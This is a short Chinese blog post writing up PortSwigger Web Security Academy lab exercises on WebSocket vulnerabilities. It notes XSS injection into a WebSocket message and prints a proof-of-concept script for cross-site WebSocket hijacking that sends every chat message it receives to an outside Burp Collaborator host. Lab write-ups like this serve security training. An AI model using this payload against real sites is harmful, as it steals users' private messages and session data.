burp靶场-WebSocket漏洞 burp靶场WebSocket漏洞1.操纵 WebSocket 消息以利用漏洞 发送信息抓包,获取WebSocket链接,插入xss代码进行发送完成实验 2.poc 123456789<script> var ws = new WebSocket('wss://0a1c003703c889ba8172b6ea000f006d.web-security-academy.net/chat'); ws.onopen = function() { ws.send("READY"); }; ws.onmessage = function(event) { fetch('https://g1iy6yqz871j2i3c0vze2cg83z9pxe.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body: event.data}); };</script> 网络安全BURP #burpsuite靶场 #WebSocket burp靶场-WebSocket漏洞 http://example.com/2023/08/17/burp靶场-WebSocket漏洞/ 作者 QY 发布于 2023年8月17日 许可协议 CSRF绕过总结 上一篇 WPS-rce-0day-漏洞复现 下一篇 Please enable JavaScript to view the comments